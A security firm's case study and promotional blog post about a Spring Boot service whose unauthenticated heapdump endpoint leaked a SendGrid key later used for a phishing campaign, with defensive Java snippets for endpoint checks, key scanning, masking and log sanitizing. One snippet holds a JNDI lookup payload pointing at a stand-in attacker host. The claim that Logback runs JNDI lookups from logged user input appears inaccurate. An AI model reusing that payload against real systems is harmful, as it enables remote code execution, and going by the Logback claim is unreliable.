Security assessments don't always turn up the dramatic stuff. No zero-days, no exotic malware, no nation-state tooling. Sometimes the most dangerous findings are hiding inside something as boring as a logging configuration. That's exactly what happened when our team reviewed a Java-based SaaS platform we work with.

We found credentials sitting in plain text. Accessible without special privileges. Confirmed the exposure in about fifteen minutes. And when we checked the automated scan results? The finding was rated low severity.

Before we finished the review, attackers had already found the same gap. They used it to blast nearly 300,000 phishing emails from the company's own verified sending domain.

Here's the full breakdown: what happened, why the scanners missed it, and what it means for any organization running Java applications.

THE SCANNER RATED IT "LOW SEVERITY." ATTACKERS WERE ALREADY INSIDE.

HOW CREDENTIALS END UP IN PLAIN TEXT IN MEMORY

Spring Boot is built for developer convenience. At startup it pulls configuration from environment variables and config files, then loads those values into application memory. Database URLs, API tokens, third-party service keys. They all sit in memory for the life of the application process.

In this company's dev environment, engineers had been running memory profiling experiments to optimize performance. Those experiments required opening diagnostic endpoints that expose live heap data. Basically a real-time window into everything the application is holding in memory at any given moment.

Those endpoints were never locked down. They stayed open for several weeks.

Here's the thing about application memory: it doesn't know the difference between a sensitive string and a log message. The SendGrid API key, the database connection string, the AWS credentials -- all of it lives in the same unencrypted heap. If you can read the heap, you can read all of it.

One important thing to understand: credentials can be injected into an application in fully encrypted form -- using secrets managers, encrypted environment variables, all the right practices -- and still appear in plain text in memory once the application decrypts them for use. Encrypting secrets at rest does not protect them from memory exposure.
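To make that concrete, here is a minimal sketch using only the JDK's built-in crypto classes. It is not the client's code; the class name, the AES-GCM choice, and the sample key value are assumptions made for illustration. It shows a secret that is ciphertext "at rest" turning into an ordinary plain-text String the moment the application decrypts it for use.

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;

/** Illustrative only: a secret encrypted at rest is plain text once decrypted. */
final class DecryptedSecretDemo {

    private static final int IV_BYTES = 12;   // conventional GCM nonce length
    private static final int TAG_BITS = 128;  // GCM authentication tag length

    static SecretKey newKey() {
        try {
            KeyGenerator generator = KeyGenerator.getInstance("AES");
            generator.init(256);
            return generator.generateKey();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    static byte[] newIv() {
        byte[] iv = new byte[IV_BYTES];
        new SecureRandom().nextBytes(iv);
        return iv;
    }

    /** Stands in for whatever protects the secret before the app starts. */
    static byte[] encrypt(SecretKey key, byte[] iv, String secret) {
        return run(Cipher.ENCRYPT_MODE, key, iv, secret.getBytes(StandardCharsets.UTF_8));
    }

    /** The returned String is regular, unencrypted heap data. */
    static String decrypt(SecretKey key, byte[] iv, byte[] ciphertext) {
        return new String(run(Cipher.DECRYPT_MODE, key, iv, ciphertext), StandardCharsets.UTF_8);
    }

    private static byte[] run(int mode, SecretKey key, byte[] iv, byte[] input) {
        try {
            Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
            cipher.init(mode, key, new GCMParameterSpec(TAG_BITS, iv));
            return cipher.doFinal(input);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        SecretKey key = newKey();
        byte[] iv = newIv();
        byte[] atRest = encrypt(key, iv, "SG.example-not-a-real-key"); // made-up value
        String inUse = decrypt(key, iv, atRest);
        // From here on, 'inUse' sits in the heap as readable characters.
        System.out.println("Ciphertext bytes at rest: " + atRest.length);
        System.out.println("Plain text in memory starts with: " + inUse.substring(0, 3));
    }
}
```

Anything that can read the heap after the decrypt call sees the same characters the application sees. The encryption did its job up to that point and no further.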

The issue also shows up in logging. With Spring Boot's default Logback setup, raising the log level to DEBUG or TRACE (common in dev environments whose settings sometimes get promoted to staging or production) can cause the application and its libraries to write entire configuration objects to log output. Those objects carry credentials. The log captures them as-is.
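A small sketch of how that leak happens at the object level. The two record types below are hypothetical, not taken from the client's codebase, and the example prints to standard output instead of going through Logback. The mechanism is the same either way: whatever toString() returns is what ends up in the log line.

```java
/** Illustrative only: how a config object can leak a credential through toString(). */
final class ConfigLoggingDemo {

    /** Records generate a toString() that prints every component, secrets included. */
    record LeakyMailConfig(String host, String apiKey) { }

    /** Same data, but toString() is overridden so the key never reaches a log line. */
    record SafeMailConfig(String host, String apiKey) {
        @Override
        public String toString() {
            return "SafeMailConfig[host=" + host + ", apiKey=****]";
        }
    }

    public static void main(String[] args) {
        // Made-up values; a real application would load these from configuration.
        LeakyMailConfig leaky = new LeakyMailConfig("smtp.example.com", "SG.not-a-real-key");
        SafeMailConfig safe = new SafeMailConfig("smtp.example.com", "SG.not-a-real-key");

        // A debug statement such as log.debug("Loaded config: {}", config)
        // formats the object with toString(), exactly as println does here.
        System.out.println("Loaded config: " + leaky);
        System.out.println("Loaded config: " + safe);
    }
}
```

Overriding toString() on credential-bearing types is a cheap safeguard, but it only covers classes you own. Library objects still need log-level and masking controls.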

The end result: credentials in heap memory, credentials in log files, and potentially credentials in whatever log aggregator or cloud storage bucket your logs ship to. None of it encrypted. All of it readable.

WHAT AN ATTACKER ACTUALLY DOES WITH THIS



The attack that occurred, and the larger attack that could have followed, played out in a pretty predictable sequence.

Step 1: Find the exposure

The diagnostic endpoints weren't hidden. An attacker scanning for common Spring Boot actuator paths -- which is a routine part of any automated recon -- would find them immediately. No credentials needed. No special knowledge of the application required.
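You can run the same check against your own systems. The sketch below is a hedged self-assessment helper, not a tool we shipped. It assumes the default /actuator base path used by Spring Boot 2 and later, and the localhost URL is a placeholder. Only point it at hosts you own: an unauthenticated GET to an open heap dump endpoint will make the server generate a dump.

```java
import java.io.IOException;
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.time.Duration;
import java.util.List;

/** Illustrative only: checks whether sensitive actuator paths answer without credentials. */
final class ActuatorExposureCheck {

    // Assumed default paths; a custom management base path would change these.
    static final List<String> PATHS = List.of("/actuator/heapdump", "/actuator/env");

    enum Verdict { OPEN, PROTECTED, NOT_FOUND, UNKNOWN }

    /** Maps an HTTP status from an unauthenticated request to a rough verdict. */
    static Verdict classify(int status) {
        if (status >= 200 && status < 300) return Verdict.OPEN;
        if (status == 401 || status == 403) return Verdict.PROTECTED;
        if (status == 404) return Verdict.NOT_FOUND;
        return Verdict.UNKNOWN;
    }

    /** Joins base URL and path without producing a double slash. */
    static URI target(String baseUrl, String path) {
        String trimmed = baseUrl.endsWith("/")
                ? baseUrl.substring(0, baseUrl.length() - 1)
                : baseUrl;
        return URI.create(trimmed + path);
    }

    /** Sends one unauthenticated GET and discards the response body. */
    static Verdict probe(HttpClient client, String baseUrl, String path) {
        HttpRequest request = HttpRequest.newBuilder(target(baseUrl, path))
                .timeout(Duration.ofSeconds(5))
                .GET()
                .build();
        try {
            HttpResponse<Void> response =
                    client.send(request, HttpResponse.BodyHandlers.discarding());
            return classify(response.statusCode());
        } catch (IOException e) {
            return Verdict.UNKNOWN; // connection refused, timeout, and similar
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            return Verdict.UNKNOWN;
        }
    }

    public static void main(String[] args) {
        String baseUrl = args.length > 0 ? args[0] : "http://localhost:8080"; // placeholder
        HttpClient client = HttpClient.newBuilder()
                .connectTimeout(Duration.ofSeconds(3))
                .build();
        for (String path : PATHS) {
            System.out.println(path + " -> " + probe(client, baseUrl, path));
        }
    }
}
```

An OPEN verdict on either path from outside your network is the condition described in this case study.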

Step 2: Pull the credentials

With heap dump access, pulling specific credentials is straightforward. SendGrid API keys follow a recognizable format (they start with "SG."). A targeted search through the memory output returns the key in seconds. No cracking, no brute force. Just reading.
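Defenders can use the same trick to confirm what a dump from their own application would reveal. This is a rough sketch under stated assumptions: only the "SG." prefix comes from the incident, while the rest of the pattern (two dot-separated runs of URL-safe characters) is our approximation of the key shape. It also assumes a JVM that stores ASCII strings one byte per character, so a key appears as contiguous bytes; dumps from JVMs that store strings as UTF-16 would need a different scan. Hits are redacted before they are returned so the checker does not become a second leak.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Illustrative only: looks for SendGrid-style key strings in raw dump bytes. */
final class DumpKeyScan {

    // "SG." prefix is from the case study; the body shape is an assumed approximation.
    static final Pattern SENDGRID_LIKE =
            Pattern.compile("SG\\.[A-Za-z0-9_-]{16,}\\.[A-Za-z0-9_-]{16,}");

    /** Returns redacted descriptions of every key-like string found in the data. */
    static List<String> findCandidates(byte[] data) {
        // ISO-8859-1 maps each byte to exactly one char, so binary data decodes cleanly.
        String text = new String(data, StandardCharsets.ISO_8859_1);
        List<String> hits = new ArrayList<>();
        Matcher matcher = SENDGRID_LIKE.matcher(text);
        while (matcher.find()) {
            hits.add(redact(matcher.group()));
        }
        return hits;
    }

    /** Keeps a short prefix for identification and hides the rest. */
    static String redact(String key) {
        return key.substring(0, 6) + "...(" + key.length() + " chars)";
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.err.println("usage: DumpKeyScan <path-to-dump>");
            return;
        }
        // Reads the whole file at once, which is fine for a sketch but not for
        // multi-gigabyte dumps; those would need chunked reads with overlap.
        byte[] data = Files.readAllBytes(Path.of(args[0]));
        findCandidates(data).forEach(hit -> System.out.println("possible key: " + hit));
    }
}
```

If this prints anything against a dump taken from a non-local environment, treat the matching key as exposed and rotate it.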

Step 3: Send at scale

The SendGrid API is well-documented and easy to use. With a valid key, an attacker can send email from any sender identity authorized on the account, including the company's own verified domain. In this case, attackers attempted to send nearly 300,000 emails before the activity was detected and the key was rotated.

What actually happened: attackers used the stolen key to run a phishing campaign from the company's legitimate sending domain. SendGrid detected the anomalous volume and flagged the account. Our team rotated the key and removed unauthorized access the same day. The attackers were unsophisticated -- they grabbed the email key and ran, without digging deeper into the infrastructure.

Step 4: The pivot that didn't happen this time

The attacker went after the easiest target: an API key they could use immediately without needing to understand the application at all. Think of it as someone breaking into a house and stealing the pots and pans while ignoring the jewelry.

Other credentials were in the same memory dump. Database connection strings. Internal service tokens. The access those credentials would have provided was significantly more sensitive. A more sophisticated attacker would have gone much further.

WHY THE SCANNER SAID "LOW" AND WHY THAT'S THE WRONG ANSWER

This is the part that should make you uncomfortable.

When automated static analysis tools scanned this codebase, the logging and memory exposure issues came back flagged as low severity. Low severity means it lands on a report, gets pushed down the priority list behind the medium and high findings, and just sits there.

Here's why scanners miss this class of vulnerability:

Static scanners analyze code patterns. They're good at catching known-bad function calls, SQL injection sinks, and hardcoded string literals that look like credentials. They are not built to trace the runtime path of a value from a secrets manager, through application initialization, into a memory dump endpoint.

"Low severity" in scanner output means low confidence in detection logic, not low real-world risk. The gap between those two things is where attackers live.

Configuration issues -- exposed actuator endpoints, DEBUG logging in non-local environments, overly permissive diagnostic tooling -- often don't show up in static code scanners at all. They live in config files and deployment settings that static analysis doesn't fully assess.

The practical result: a finding that allows full credential extraction gets deprioritized as routine cleanup, while the team focuses on the medium and high items. The low finding stays open. The attackers find it first.

"Low" doesn't mean low risk. It means the tool didn't recognize the exploitation path. Those are very different things.

THE TECHNICAL ROOT CAUSE: LOGBACK, MEMORY ENDPOINTS, AND REMOTE CODE EXECUTION

Two distinct issues combined to create the exposure.

The memory exposure vector

Spring Boot's Actuator module includes management endpoints for monitoring and diagnostics. The heapdump endpoint (served at /actuator/heapdump by default in Spring Boot 2 and later) provides a binary dump of the JVM heap on demand -- every object in memory, including all loaded configuration values, secrets, and session data.

In a properly secured environment, these endpoints are either disabled or protected behind authentication and network controls. In this environment, they were reachable from outside the application perimeter. That's the root cause of the credential exposure.
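As a rough illustration of "disabled or protected," the fragment below shows the kind of application.properties settings that close this door. It is a sketch, not the client's configuration. It assumes Spring Boot 2.x or 3.x; newer releases may use a different property to turn an endpoint off, so check the reference documentation for your version. The port number is an arbitrary example.

```properties
# Sketch only. Assumes Spring Boot 2.x / 3.x property names.

# Expose only the health endpoint over HTTP; other endpoints stay unexposed.
management.endpoints.web.exposure.include=health

# Turn the heap dump endpoint off entirely.
management.endpoint.heapdump.enabled=false

# Serve management endpoints on a separate port bound to loopback,
# so they are not reachable from outside the host. Port is an example value.
management.server.port=8081
management.server.address=127.0.0.1
```

Authentication for any endpoint that does stay exposed would be layered on top of this, typically through the application's existing security configuration.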

The Logback remote code execution vector

The second issue is more severe and more broadly applicable. Spring Boot uses Logback as its default logging framework. Logback has documented lookup injection risks in certain configurations: if an application logs untrusted user input -- data from a request parameter, an HTTP header, a form field -- and that input contains a specially crafted JNDI lookup expression, Logback can trigger remote code execution.

This is the same vulnerability class as Log4Shell (CVE-2021-44228), which affected a very large number of Java applications that depended on Log4j 2. Logback has its own version of this risk in specific configurations.

In this application, certain request parameters were flowing into log statements without any sanitization. A malicious actor could send a crafted payload that, when the application logs it, reaches out to an attacker-controlled server and executes arbitrary code on the application host.

Plain-language version: an attacker sends a specially formatted string in a web form or URL parameter. The application logs it. Logback processes it. The attacker's code runs on the server. Full system compromise from a single form submission.

The static scanner flagged the Logback version as low severity. The actual risk was remote code execution. That's the gap that manual review exists to close.
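One way to keep payloads like that out of log statements is to neutralize user-controlled values before they reach the logger. The helper below is a minimal sketch with a hypothetical class name and an arbitrary length cap, not a complete defense. It breaks up the "${" sequence that lookup expressions depend on, replaces control characters that enable log forging, and truncates oversized values.

```java
/** Illustrative only: neutralizes user-controlled text before it is logged. */
final class LogInputSanitizer {

    private static final int MAX_LEN = 200; // hypothetical cap, tune per field

    static String sanitize(String raw) {
        if (raw == null) {
            return "(null)";
        }
        // Replace CR, LF, tabs and other control characters so one request
        // cannot forge extra log lines.
        String cleaned = raw.replaceAll("\\p{Cntrl}", "_");
        // Break every "${" so no lookup expression survives. Inserting a
        // character (instead of deleting one) means inputs like "$${"
        // cannot collapse back into "${".
        cleaned = cleaned.replace("${", "$_{");
        return cleaned.length() > MAX_LEN
                ? cleaned.substring(0, MAX_LEN) + "..."
                : cleaned;
    }

    public static void main(String[] args) {
        String header = "${jndi:ldap://attacker.example/a}"; // made-up payload
        System.out.println("User-Agent: " + sanitize(header));
    }
}
```

Sanitizing at the log boundary is a second line of defense. Patching the logging library and keeping untrusted input out of log templates still come first.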

REAL-WORLD BUSINESS IMPACT

Technical findings are only half the story. Here's what this kind of exposure actually costs.

EMAIL DELIVERABILITY: Domain reputation can take six to twelve months to recover after a spam event. Mailbox providers like Google and Microsoft track sending patterns over time. One blast can trigger blocklist entries that affect every email you send -- invoices, onboarding, password resets. In this case the activity was caught quickly. A longer window would have been a much bigger problem.

BRAND TRUST: Every phishing email sent from a compromised account has your company's name on it. Your domain. Your sending identity. The fact that you didn't send it doesn't matter to the customer on the receiving end.

DATA EXPOSURE: Attackers in this incident went after the email key and stopped there. Other credentials in the same memory dump would have provided access to customer data, transaction records, and backend infrastructure. The potential for exfiltration was real -- it just wasn't exploited by this particular attacker.

REGULATORY COST: A successful exploit that leads to data exfiltration can require formal breach notification depending on applicable regulations. Legal, forensics, filings, customer notification, credit monitoring. The fully loaded cost of a breach response is typically several times what a security assessment costs upfront.

WHAT WE DID: THE FULL REMEDIATION

When the exposure was confirmed, the team moved fast.

Immediate response (same day):

Rotated the compromised SendGrid API key and audited the account for unauthorized sends, new sender identities, and any API key additions.

Disabled all open diagnostic endpoints, including the heap dump endpoint that was the primary exposure vector.

Initiated full credential rotation across all services: database passwords, internal service tokens, third-party API keys. If there was any chance a credential was accessible during the exposure window, it was replaced.

Infrastructure hardening:

Locked all Spring Boot Actuator endpoints behind authentication and restricted access to internal network traffic only.

Upgraded Spring Boot to the current stable release, pulling in updated Logback dependencies and patching known lookup injection vulnerabilities.

Rewrote the Logback configuration to enforce INFO level logging in all non-local environments, with explicit exclusions for packages that handle credential-bearing objects.

Added Logback masking patterns for common sensitive field names (password, token, apiKey, secret, Authorization). Even if a credential reaches a log call, it renders as asterisks.

Implemented input sanitization at all log boundaries to strip JNDI lookup syntax from user-controlled data before it reaches the logger.
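The masking step above can be sketched in plain Java. This is not the Logback configuration we deployed; the class name and regular expression are our illustration of the idea. It uses the field names listed above and assumes credentials show up in key=value, "key: value", or JSON-style shapes.

```java
import java.util.regex.Pattern;

/** Illustrative only: replaces values of sensitive-looking fields with asterisks. */
final class LogMasker {

    // Group 1 captures the field name and separator, group 2 the value to hide.
    // An optional "Bearer " or "Basic " scheme is folded into the hidden value.
    private static final Pattern SENSITIVE = Pattern.compile(
            "(?i)(\"?(?:password|token|apiKey|secret|authorization)\"?\\s*[=:]\\s*\"?)"
            + "((?:(?:Bearer|Basic)\\s+)?[^\\s\",;&]+)");

    static String mask(String message) {
        // Keep the field name so the log stays readable; drop the value.
        return SENSITIVE.matcher(message).replaceAll("$1****");
    }

    public static void main(String[] args) {
        // Made-up sample lines.
        System.out.println(mask("apiKey=SG.not-a-real-key user=bob"));
        System.out.println(mask("{\"password\":\"hunter2\",\"user\":\"bob\"}"));
        System.out.println(mask("Authorization: Bearer abc.def"));
    }
}
```

In a Logback setup, a regex like this would normally live in the encoder pattern or a custom converter so every message passes through it. Name-based masking only catches credentials that appear next to a recognizable field name, which is why it sits alongside log-level and sanitization controls and does not replace them.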

Operational upgrades:

Added mandatory MFA across the SendGrid account, cloud infrastructure console, logging platform, and source code repository.

Deployed runtime secret scanning to monitor for credential patterns appearing in log streams in real time. If a string matching an API key format hits a log sink, it alerts before persisting to storage.

Added monitoring for heap dump generation events. Any heap dump on a production or staging instance now triggers an immediate review and credential rotation check.

Tightened API key scope to minimum required permissions across all third-party services, limiting the blast radius of any future exposure.
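For the log-stream scanning item above, here is a hedged sketch of the idea using the JDK's built-in java.util.logging Filter interface. It is not the Logback-based tooling we deployed. The key patterns are approximations we chose for illustration, and dropping the record (in addition to alerting) is a design choice of this sketch.

```java
import java.util.function.Consumer;
import java.util.logging.Filter;
import java.util.logging.LogRecord;
import java.util.regex.Pattern;

/** Illustrative only: alerts on, and drops, log records that look like they contain a key. */
final class SecretAlertFilter implements Filter {

    // Assumed shapes: a SendGrid-style "SG." key and an AWS-style access key ID.
    private static final Pattern KEY_LIKE = Pattern.compile(
            "SG\\.[A-Za-z0-9_-]{16,}\\.[A-Za-z0-9_-]{16,}|AKIA[0-9A-Z]{16}");

    private final Consumer<String> alert;

    SecretAlertFilter(Consumer<String> alert) {
        this.alert = alert;
    }

    @Override
    public boolean isLoggable(LogRecord record) {
        // getMessage() is the raw message template; parameters passed separately
        // to the logger are not inspected by this simple version.
        String message = record.getMessage();
        if (message != null && KEY_LIKE.matcher(message).find()) {
            // The alert names the logger but never repeats the matched text.
            alert.accept("credential-like string in logger " + record.getLoggerName());
            return false; // drop the record before any handler persists it
        }
        return true;
    }
}
```

A filter like this can be attached with Handler.setFilter so it runs before records are written out. In practice the alert callback would page someone or open a ticket; here it is just a Consumer so the example stays self-contained.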

LESSONS LEARNED

Automated scans are a starting point, not a finish line

This is a clear example of why automated scanning alone isn't enough. No individual line of code was obviously wrong. The risk came from how multiple components interacted at runtime: a diagnostic endpoint, an unencrypted heap, a misconfigured logger, and untrusted input flowing into a log statement. That kind of finding requires a human to trace it end-to-end.

Severity ratings need manual validation

A "low" finding is not permission to deprioritize. It means the scanner's pattern didn't match -- not that the issue is safe to ignore. Anything touching credentials or user data needs a human to assess what's actually behind that rating.

Dev environments are production risks

The assumption that dev and staging are isolated and lower-stakes leads to configuration debt that follows code into production. Every environment touching real credentials needs production-level controls. "We'll fix it before it goes live" is how breaches happen.

Credential hygiene needs automation

Human processes for tracking which keys are active and when they were last rotated break down at scale. Runtime scanning and automated rotation workflows are baseline operational security for any application handling sensitive data.

Combine automated scans with manual review and memory checks

The security program that would have caught this: automated scanning for known patterns, manual code review tracing credential flows end-to-end, and runtime monitoring for credential exposure in logs and memory. Any one of those layers alone is not enough. Together, they make this class of finding very hard to miss.

IS YOUR JAVA APPLICATION EXPOSED RIGHT NOW?

The vulnerability class in this case study is present in a meaningful percentage of Java applications running Spring Boot -- especially those with diagnostic tooling enabled, older Logback versions, or logging configurations that haven't been audited recently. The only way to know if you're exposed is to look.

Red Sentry's manual penetration testing team does exactly this. We trace credential flows through your application end-to-end, test your logging configuration against real-world attack patterns, and validate what your automated scanners are calling "low."

This attacker only wanted an email key. The next one might want your customer database.

Schedule a security assessment: redsentry.com/get-a-pentest

Red Sentry is a cybersecurity firm providing penetration testing, application security assessments, and continuous security monitoring. This case study is published for educational purposes. Identifying details have been removed to protect client confidentiality.

Your Scanner Said "Low." Attackers Sent 300,000 Emails.